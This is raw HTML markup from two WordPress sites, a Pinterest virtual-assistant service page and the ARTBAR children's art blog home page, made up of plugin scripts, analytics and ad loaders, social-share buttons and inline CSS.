src='https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/plugins/social-warfare/assets/js/script.min.js?ver=3.5.4'></script> <script type='text/javascript' src='https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/themes/restored316-captivating/js/jquery.matchHeight-min.js?ver=1.0.0'></script> <script type='text/javascript' src='https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/themes/restored316-captivating/js/matchheight-init.js?ver=1.0.0'></script> <script type='text/javascript'> /* <![CDATA[ */ var genesis_responsive_menu = {"mainMenu":"Menu","menuIconClass":"dashicons-before dashicons-menu","subMenu":"Submenu","subMenuIconsClass":"dashicons-before dashicons-arrow-down-alt2","menuClasses":{"combine":[".nav-header",".nav-header-left",".nav-header-right",".nav-secondary",".nav-primary"],"others":[".nav-footer"]}}; /* ]]> */ </script> <script type='text/javascript' src='https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/themes/restored316-captivating/js/responsive-menus.min.js?ver=1.0.1'></script> <script type='text/javascript' src='https://sxqykv430h-flywheel.netdna-ssl.com/wp-includes/js/wp-embed.min.js?ver=5.1.1'></script> <script type='text/javascript' src='https://sxqykv430h-flywheel.netdna-ssl.com/wp-includes/js/imagesloaded.min.js?ver=3.2.0'></script> <script type='text/javascript' src='https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=2.5.14'></script> <script type='text/javascript' src='https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/plugins/elementor-pro/assets/lib/sticky/jquery.sticky.min.js?ver=2.4.8'></script> <script type='text/javascript'> /* <![CDATA[ */ var ElementorProFrontendConfig = {"ajaxurl":"https:\/\/pinterestva.com\/wp-admin\/admin-ajax.php","nonce":"92f628b408","shareButtonsNetworks":{"facebook":{"title":"Facebook","has_counter":true},"twitter":{"title":"Twitter"},"google":{"title":"Google+","has_counter":true},"linkedin":{"title":"LinkedIn","has_counter":true},"pinterest":{"title":"Pinterest","has_counter":true},"reddit":{"title":"Reddit","has_counter":true},"vk":{"title":"VK","has_counter":true},"odnoklassniki":{"title":"OK","has_counter":true},"tumblr":{"title":"Tumblr"},"delicious":{"title":"Delicious"},"digg":{"title":"Digg"},"skype":{"title":"Skype"},"stumbleupon":{"title":"StumbleUpon","has_counter":true},"telegram":{"title":"Telegram"},"pocket":{"title":"Pocket","has_counter":true},"xing":{"title":"XING","has_counter":true},"whatsapp":{"title":"WhatsApp"},"email":{"title":"Email"},"print":{"title":"Print"}},"facebook_sdk":{"lang":"en_US","app_id":""}}; /* ]]> */ </script> <script type='text/javascript' src='https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=2.4.8'></script> <script type='text/javascript' src='https://sxqykv430h-flywheel.netdna-ssl.com/wp-includes/js/jquery/ui/position.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.7.1'></script> <script type='text/javascript' src='https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.2'></script> <script type='text/javascript' src='https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=4.4.6'></script> <script type='text/javascript'> var elementorFrontendConfig = {"environmentMode":{"edit":false,"wpPreview":false},"is_rtl":false,"breakpoints":{"xs":0,"sm":480,"md":768,"lg":981,"xl":1440,"xxl":1600},"version":"2.5.14","urls":{"assets":"https:\/\/pinterestva.com\/wp-content\/plugins\/elementor\/assets\/"},"settings":{"page":[],"general":{"elementor_global_image_lightbox":"yes","elementor_enable_lightbox_in_editor":"yes"}},"post":{"id":1949,"title":"Pinterest Virtual Assistant","excerpt":""}}; </script> <script type='text/javascript' src='https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=2.5.14'></script> <div class="swp_social_panelSide swp_floating_panel swp_social_panel swp_circles swp_default_full_color swp_other_full_color swp_individual_full_color slide swp_float_left swp_side_center scale-100 float-position-center-left" data-min-width="960" data-float-color="#ffffff" data-float="left" data-float-mobile="bottom" data-transition="slide" ><div class="nc_tweetContainer swp_share_button total_shares total_sharesalt" ><span class="swp_count ">11K <span class="swp_label">Shares</span></span></div><div class="nc_tweetContainer swp_share_button swp_pinterest" data-network="pinterest"><a rel="nofollow noreferrer noopener" class="nc_tweet swp_share_link noPop" onClick="var e=document.createElement('script'); e.setAttribute('type','text/javascript'); e.setAttribute('charset','UTF-8'); e.setAttribute('src','//assets.pinterest.com/js/pinmarklet.js?r='+Math.random()*99999999); document.body.appendChild(e); " ><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_pinterest_icon"></i><span class="swp_share">Pin</span></span></span><span class="swp_count">8K</span></a></div><div class="nc_tweetContainer swp_share_button swp_facebook" data-network="facebook"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.facebook.com/share.php?u=https%3A%2F%2Fpinterestva.com%2F" data-link="https://www.facebook.com/share.php?u=https%3A%2F%2Fpinterestva.com%2F"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_facebook_icon"></i><span class="swp_share">Share</span></span></span><span class="swp_count">3K</span></a></div><div class="nc_tweetContainer swp_share_button swp_linkedin" data-network="linkedin"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fpinterestva.com%2F" data-link="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fpinterestva.com%2F"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_linkedin_icon"></i><span class="swp_share">Share</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_twitter" data-network="twitter"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://twitter.com/intent/tweet?text=Pinterest+Virtual+Assistant&url=https%3A%2F%2Fpinterestva.com%2F" data-link="https://twitter.com/intent/tweet?text=Pinterest+Virtual+Assistant&url=https%3A%2F%2Fpinterestva.com%2F"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_twitter_icon"></i><span class="swp_share">Tweet</span></span></span></span></a></div></div><script type="text/javascript"> var swp_nonce = "feed34fe34";var swpFloatBeforeContent = false;var swpClickTracking = false; swpPinIt={"enabled":false};</script></body></html>
0
<!DOCTYPE html> <!--[if IE 7]> <html class="ie ie7" lang="en-US" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if IE 8]> <html class="ie ie8" lang="en-US" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if !(IE 7) | !(IE 8) ]><!--> <html lang="en-US" prefix="og: http://ogp.me/ns#"> <!--<![endif]--> <head> <meta charset="UTF-8"/> <meta name="viewport" content="width=device-width, initial-scale=1.0"/> <script>var et_site_url='https://www.artbarblog.com';var et_post_id='15673';function et_core_page_resource_fallback(a,b){"undefined"===typeof b&&(b=a.sheet.cssRules&&0===a.sheet.cssRules.length);b&&(a.onerror=null,a.onload=null,a.href?a.href=et_site_url+"/?et_core_page_resource="+a.id+et_post_id:a.src&&(a.src=et_site_url+"/?et_core_page_resource="+a.id+et_post_id))} </script><title>Home - ARTBAR</title> <style type="text/css">.tve_more_tag {visibility: hidden; height: 1px!important;}</style> <!-- Social Pug v.2.6.2 https://devpups.com/social-pug/ --> <meta property="og:site_name" content="ARTBAR" /> <meta property="og:locale" content="en_US"/> <meta property="og:type" content="article" /> <meta property="og:url" content="https://www.artbarblog.com/" /> <meta property="og:title" content="Home" /> <meta property="og:description" content="GET MY FREE NEWSLETTER WITH BI-MONTHLY ART INSPIRATION&nbsp;ABOUTBLOGCONTACTPRIVACYART IDEAS FOR THE WHOLE FAMILYART IDEAS FOR THE WHOLE FAMILYPROCESS ARTRECYCLED ARTNATURE ARTPROCESS ARTRECYCLED ARTNATURE ARTCRAFTS for KIDSTODDLER ARTTEEN CRAFTSCRAFTS for KIDSTODDLER ARTTEEN CRAFTSDIYSENSORY PLAYARTIST STUDIESDIYSENSORY PLAYARTIST" /> <meta property="og:updated_time" content="2019-05-16T07:53:30+00:00" /> <meta property="article:published_time" content="2018-10-05T10:39:45+00:00" /> <meta property="article:modified_time" content="2019-05-16T07:53:30+00:00" /> <meta name="twitter:card" content="summary_large_image" /> <meta name="twitter:title" content="Home" /> <meta name="twitter:description" content="GET MY FREE NEWSLETTER WITH BI-MONTHLY ART INSPIRATION&nbsp;ABOUTBLOGCONTACTPRIVACYART IDEAS FOR THE WHOLE FAMILYART IDEAS FOR THE WHOLE FAMILYPROCESS ARTRECYCLED ARTNATURE ARTPROCESS ARTRECYCLED ARTNATURE ARTCRAFTS for KIDSTODDLER ARTTEEN CRAFTSCRAFTS for KIDSTODDLER ARTTEEN CRAFTSDIYSENSORY PLAYARTIST STUDIESDIYSENSORY PLAYARTIST" /> <!-- Social Pug v.2.6.2 https://devpups.com/social-pug/ --> <script> window.adthrive = window.adthrive || {}; window.adthrive.cmd = window.adthrive.cmd || []; window.adthrive.host = 'ads.adthrive.com'; window.adthrive.plugin = 'adthrive-ads-1.0.32'; window.adthrive.threshold = Math.floor(Math.random() * 100 + 1); (function() { var script = document.createElement('script'); script.async = true; script.type = 'text/javascript'; script.src = document.location.protocol + '//ads.adthrive.com/sites/552414358122621373a81a0e/ads.min.js?threshold=' + window.adthrive.threshold; var node = document.getElementsByTagName('script')[0]; node.parentNode.insertBefore(script, node); })(); </script> <!-- This site is optimized with the Yoast SEO Premium plugin v11.0 - https://yoast.com/wordpress/plugins/seo/ --> <link rel="canonical" href="https://www.artbarblog.com/" /> <script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://www.artbarblog.com/#website","url":"https://www.artbarblog.com/","name":"ARTBAR","publisher":{"@id":"https://www.artbarblog.com/#organization"},"potentialAction":{"@type":"SearchAction","target":"https://www.artbarblog.com/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"WebPage","@id":"https://www.artbarblog.com/#webpage","url":"https://www.artbarblog.com/","inLanguage":"en-US","name":"Home - ARTBAR","isPartOf":{"@id":"https://www.artbarblog.com/#website"},"about":{"@id":"https://www.artbarblog.com/#organization"},"datePublished":"2018-10-05T15:39:45+00:00","dateModified":"2019-05-16T12:53:30+00:00"}]}</script> <!-- / Yoast SEO Premium plugin. --> <link rel='dns-prefetch' href='//maxcdn.bootstrapcdn.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="ARTBAR &raquo; Feed" href="https://www.artbarblog.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="ARTBAR &raquo; Comments Feed" href="https://www.artbarblog.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.artbarblog.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.10"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='tve_landing_page_base_css-css' href='https://www.artbarblog.com/wp-content/plugins/thrive-visual-editor/landing-page/templates/css/base.css' type='text/css' media='all' /> <link rel='stylesheet' id='tve_landing_page_blank_v2-css' href='https://www.artbarblog.com/wp-content/plugins/thrive-visual-editor/landing-page/templates/css/blank_v2.css' type='text/css' media='all' /> <link rel='stylesheet' id='contact-form-7-css' href='https://www.artbarblog.com/wp-content/plugins/contact-form-7/includes/css/styles.css' type='text/css' media='all' /> <link rel='stylesheet' id='sb_instagram_styles-css' href='https://www.artbarblog.com/wp-content/plugins/instagram-feed/css/sb-instagram.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='sb-font-awesome-css' href='https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='dpsp-frontend-style-pro-css' href='https://www.artbarblog.com/wp-content/plugins/social-pug/assets/css/style-frontend-pro.css' type='text/css' media='all' /> <link rel='stylesheet' id='tve_style_family_tve_flt-css' href='https://www.artbarblog.com/wp-content/plugins/thrive-visual-editor/editor/css/thrive_flat.css' type='text/css' media='all' /> <link rel='stylesheet' id='tve_leads_forms-css' href='//www.artbarblog.com/wp-content/plugins/thrive-leads/editor-layouts/css/frontend.css' type='text/css' media='all' /> <link rel='stylesheet' id='woocommerce-layout-css' href='https://www.artbarblog.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css' type='text/css' media='all' /> <link rel='stylesheet' id='woocommerce-smallscreen-css' href='https://www.artbarblog.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css' type='text/css' media='only screen and (max-width: 768px)' /> <link rel='stylesheet' id='woocommerce-general-css' href='https://www.artbarblog.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css' type='text/css' media='all' /> <link rel='stylesheet' id='yith_wcas_frontend-css' href='https://www.artbarblog.com/wp-content/plugins/yith-woocommerce-ajax-search/assets/css/yith_wcas_ajax_search.css' type='text/css' media='all' /> <link rel='stylesheet' id='google-fonts-css' href='//fonts.googleapis.com/css?family=Muli%3Aregular%2Citalic%2C300%2C300italic%7CKarla%3Aregular%2Citalic%2C700%26subset%3Dlatin%2C&#038;ver=3.0.0' type='text/css' media='all' /> <link rel='stylesheet' id='recent-posts-widget-with-thumbnails-public-style-css' href='https://www.artbarblog.com/wp-content/plugins/recent-posts-widget-with-thumbnails/public.css' type='text/css' media='all' /> <link rel='stylesheet' id='simple-social-icons-font-css' href='https://www.artbarblog.com/wp-content/plugins/simple-social-icons/css/style.css' type='text/css' media='all' /> <link rel='stylesheet' id='upw_theme_standard-css' href='https://www.artbarblog.com/wp-content/plugins/ultimate-posts-widget/css/upw-theme-standard.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='mimi-base-css' href='https://www.artbarblog.com/wp-content/plugins/mad-mimi-sign-up-forms/css/mimi.min.css' type='text/css' media='all' /> <script type='text/javascript' src='https://www.artbarblog.com/wp-includes/js/jquery/jquery.js'></script> <script type='text/javascript' src='https://www.artbarblog.com/wp-includes/js/jquery/jquery-migrate.min.js'></script> <script type='text/javascript' src='https://www.artbarblog.com/wp-content/plugins/social-pug/assets/js/front-end-pro.js'></script> <!--[if lt IE 9]> <script type='text/javascript' src='https://www.artbarblog.com/wp-content/themes/genesis/lib/js/html5shiv.min.js'></script> <![endif]--> <script type='text/javascript' src='https://www.artbarblog.com/wp-content/plugins/simple-social-icons/svgxuse.js'></script> <link rel='https://api.w.org/' href='https://www.artbarblog.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.artbarblog.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.artbarblog.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 4.9.10" /> <meta name="generator" content="WooCommerce 3.6.1" /> <link rel='shortlink' href='https://www.artbarblog.com/' /> <link rel="alternate" type="application/json+oembed" href="https://www.artbarblog.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.artbarblog.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://www.artbarblog.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.artbarblog.com%2F&#038;format=xml" /> <style type="text/css" id="tve_global_variables">:root{--tcb-color-0:rgba(0, 0, 0, 0.38);--tcb-color-1:rgb(253, 160, 153);--tcb-color-2:rgb(255, 255, 255);--tcb-color-3:rgb(221, 221, 221);}</style><!-- Analytics by WP-Statistics v12.6.3 - https://wp-statistics.com/ --> <script>var WP_Statistics_http = new XMLHttpRequest();WP_Statistics_http.open('POST', 'https://www.artbarblog.com/wp-json/wpstatistics/v1/hit?_=1558022243', true);WP_Statistics_http.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");WP_Statistics_http.send("wp_statistics_hit=" + JSON.stringify({"base":"https://www.artbarblog.com/wp-json","browser":"Firefox","platform":"Windows","version":"6.1","referred":"http://artbarblog.com","api":"wp-json","ip":"144.217.14.124","hash_ip":"#hash#eb592b0068091337e7ac018f8f715d2af8b7c81c","exclude":"","exclude_reason":"","ua":"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0","track_all":"1","timestamp":"1558004243","search_query":"","current_page_type":"home","current_page_id":"15673","page_uri":"/","user_id":"0"}));</script> <link rel="pingback" href="https://www.artbarblog.com/xmlrpc.php" /> <!-- Facebook Pixel Code --> <script> !function(f,b,e,v,n,t,s) {if(f.fbq)return;n=f.fbq=function(){n.callMethod? n.callMethod.apply(n,arguments):n.queue.push(arguments)}; if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0'; n.queue=[];t=b.createElement(e);t.async=!0; t.src=v;s=b.getElementsByTagName(e)[0]; s.parentNode.insertBefore(t,s)}(window,document,'script', 'https://connect.facebook.net/en_US/fbevents.js'); fbq('init', '158351494758377'); fbq('track', 'PageView'); </script> <noscript> <img height="1" width="1" src="https://www.facebook.com/tr?id=158351494758377&ev=PageView &noscript=1"/> </noscript> <!-- End Facebook Pixel Code --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-35306060-1', 'auto'); ga('send', 'pageview'); </script> <noscript></noscript> <link rel="icon" href="https://www.artbarblog.com/wp-content/uploads/2016/07/logo-6-100x100.png" sizes="32x32" /> <link rel="icon" href="https://www.artbarblog.com/wp-content/uploads/2016/07/logo-6.png" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://www.artbarblog.com/wp-content/uploads/2016/07/logo-6.png" /> <meta name="msapplication-TileImage" content="https://www.artbarblog.com/wp-content/uploads/2016/07/logo-6.png" /> <style type="text/css" class="tve_global_style"></style> <style type="text/css" class="tve_custom_style">@import url("//fonts.googleapis.com/css?family=Karla:400&subset=latin");@media (min-width: 300px){[data-css="tve-u-166434051f2"] { width: 438px; float: none; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-16643416892"] { max-width: 400px; float: none; width: 100%; border: none; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-16643446433"] { font-size: 15px; margin-left: auto; margin-right: auto; width: 15px; height: 15px; margin-top: 15px !important; margin-bottom: 0px !important; }[data-css="tve-u-1664344d0b1"] { font-size: 15px; margin-left: auto; margin-right: auto; width: 15px; height: 15px; margin-top: 15px !important; }[data-css="tve-u-16643450a35"] { font-size: 15px; margin-left: auto; margin-right: auto; width: 15px; height: 15px; margin-top: 15px !important; }[data-css="tve-u-16643453c1f"] { font-size: 15px; margin-left: auto; margin-right: auto; width: 15px; height: 15px; margin-top: 15px !important; }[data-css="tve-u-1664345c3ca"] { margin-top: 0px !important; margin-bottom: 0px !important; }[data-css="tve-u-1664345cbd7"] { padding-top: 0px !important; padding-bottom: 0px !important; }[data-css="tve-u-16643466697"] { border-top: 1px solid rgb(221, 221, 221); border-bottom: 1px solid rgb(221, 221, 221); padding-top: 0px !important; padding-bottom: 0px !important; }[data-css="tve-u-1664346bc8c"] { padding-top: 0px !important; padding-bottom: 0px !important; }[data-css="tve-u-16643474281"] { padding-top: 0px !important; padding-bottom: 0px !important; }[data-css="tve-u-1664347584c"] { padding-top: 0px !important; padding-bottom: 0px !important; }[data-css="tve-u-1664347655b"] { padding-top: 0px !important; padding-bottom: 0px !important; }[data-css="tve-u-16643477284"] { padding-top: 0px !important; padding-bottom: 0px !important; }#tve_editor [data-css="tve-u-16643497b49"] { font-family: Karla !important; font-weight: 400 !important; font-size: 14px !important; }#tve_editor [data-css="tve-u-16643499bae"] { font-family: Karla !important; font-weight: 400 !important; font-size: 14px !important; }#tve_editor [data-css="tve-u-1664349c266"] { font-family: Karla !important; font-weight: 400 !important; font-size: 14px !important; }#tve_editor [data-css="tve-u-1664349e108"] { font-family: Karla !important; font-weight: 400 !important; font-size: 14px !important; }[data-css="tve-u-166434c6cca"] { float: none; width: 100%; max-width: 920px; margin-left: auto !important; margin-right: auto !important; }#tcb_landing_page a:not(.tcb-button-link) { color: rgb(0, 0, 0); text-decoration: none; }#tcb_landing_page p, #tcb_landing_page li { font-family: Karla; font-weight: 400; }#tcb_landing_page .tcb-button-link { font-family: Karla; font-weight: 400; }#tcb_landing_page input { font-family: Karla; font-weight: 400; }[data-css="tve-u-16644009847"] { width: 289px; float: none; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-1664400c05f"] { width: 96%; float: none; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-16644010cd7"] { max-width: 920px; float: none; width: 100%; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-16644013340"] { width: 296px; }[data-css="tve-u-16644016472"] { width: 296px; float: none; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-166440183c9"] { width: 296px; float: none; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-166440199cc"] { max-width: 920px; float: none; width: 100%; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-16644024c6b"] { max-width: 920px; float: none; width: 100%; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-1664402f75c"] { max-width: 920px; float: none; width: 100%; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-16644036842"] { max-width: 920px; float: none; width: 100%; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-1664403e798"] { max-width: 920px; float: none; width: 100%; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-1664409e69f"] { float: none; width: 100%; max-width: 1414px; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-166440bf212"] { max-width: none; }[data-css="tve-u-166440c038d"] { background-image: linear-gradient(rgb(253, 160, 153), rgb(253, 160, 153)) !important; background-size: auto !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }[data-css="tve-u-166442a1dc1"] { margin-top: 35px !important; background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/art-ideas-for-the-whole-family2.png") !important; background-size: auto !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }#tve_editor [data-css="tve-u-166442bc496"] { letter-spacing: 2px; color: rgb(255, 255, 255) !important; font-size: 24px !important; font-family: Karla !important; font-weight: 400 !important; }[data-css="tve-u-166442e2438"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/todder-art-banner.png") !important; background-size: cover !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }[data-css="tve-u-166442e8ea1"] { width: 296px; float: none; margin-left: auto !important; margin-right: auto !important; }#tve_editor [data-css="tve-u-166442eab4d"] { color: rgb(255, 255, 255) !important; font-size: 20px !important; }[data-css="tve-u-166442ef0ac"] { width: 297px; float: none; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-166442efae6"] { width: 297px; }[data-css="tve-u-166442f5b73"] { width: 297px; }[data-css="tve-u-166442f63db"] { width: 297px; }[data-css="tve-u-166442f6b40"] { width: 297px; }[data-css="tve-u-166442fa780"] { width: 297px; float: none; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-166442fb125"] { width: 296px; float: none; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-166442fbb5e"] { width: 296px; float: none; z-index: 3; position: relative; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-166442fd0d3"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/todder-art-banner.png") !important; background-size: cover !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; margin-top: -2px !important; }#tve_editor [data-css="tve-u-166442ffec5"] { color: rgb(255, 255, 255) !important; font-size: 20px !important; }#tve_editor [data-css="tve-u-1664431c53d"] { letter-spacing: 1px; color: rgb(255, 255, 255) !important; }#tve_editor [data-css="tve-u-16644322cd7"] { letter-spacing: 1px; color: rgb(255, 255, 255) !important; }[data-css="tve-u-1664433dcc9"] { float: none; width: 100%; background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/lilac-banner.png") !important; background-size: cover !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; margin-left: auto !important; margin-right: auto !important; }#tve_editor [data-css="tve-u-166443427a0"] { color: rgb(255, 255, 255) !important; }#tve_editor [data-css="tve-u-16644347cd9"] { letter-spacing: 1px; color: rgb(255, 255, 255) !important; font-size: 20px !important; }[data-css="tve-u-16644375d33"] { width: 100%; float: none; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-1664437b549"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/lilac-banner.png") !important; background-size: cover !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }#tve_editor [data-css="tve-u-166443827b2"] { letter-spacing: 1px; color: rgb(255, 255, 255) !important; font-size: 20px !important; }[data-css="tve-u-1664439713e"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/salmon-pink-banner-short.png") !important; background-size: cover !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }#tve_editor [data-css="tve-u-1664439e28e"] { letter-spacing: 1px; color: rgb(255, 255, 255) !important; font-size: 20px !important; }#tve_editor [data-css="tve-u-166443b48a1"] { letter-spacing: 1px; color: rgb(255, 255, 255) !important; font-size: 20px !important; }[data-css="tve-u-166443b64fc"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/salmon-pink-banner-short.png") !important; background-size: cover !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }#tve_editor [data-css="tve-u-166443c2cf6"] { letter-spacing: 1px; color: rgb(255, 255, 255) !important; }#tve_editor [data-css="tve-u-166443db6fe"] { color: rgb(255, 255, 255) !important; font-size: 20px !important; }[data-css="tve-u-166443e0dae"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/grass-green-short-banner.png") !important; background-size: cover !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }#tve_editor [data-css="tve-u-166443e5136"] { letter-spacing: 1px; color: rgb(255, 255, 255) !important; }[data-css="tve-u-166443f8125"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/bubble-gum-pin-short-banner.png") !important; background-size: cover !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }#tve_editor [data-css="tve-u-166443fc4cd"] { color: rgb(255, 255, 255) !important; font-size: 20px !important; }#tve_editor [data-css="tve-u-16644400e12"] { letter-spacing: 1px; color: rgb(255, 255, 255) !important; }[data-css="tve-u-1664440489f"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/bubble-gum-pin-short-banner.png") !important; background-size: cover !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }#tve_editor [data-css="tve-u-1664441ee44"] { letter-spacing: 1px; color: rgb(255, 255, 255) !important; font-size: 20px !important; }#tve_editor [data-css="tve-u-16644429fbd"] { letter-spacing: 1px; color: rgb(255, 255, 255) !important; font-size: 20px !important; }[data-css="tve-u-1664442aa1d"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/bubble-gum-pin-short-banner.png") !important; background-size: cover !important; background-position: 50% 50% !important; 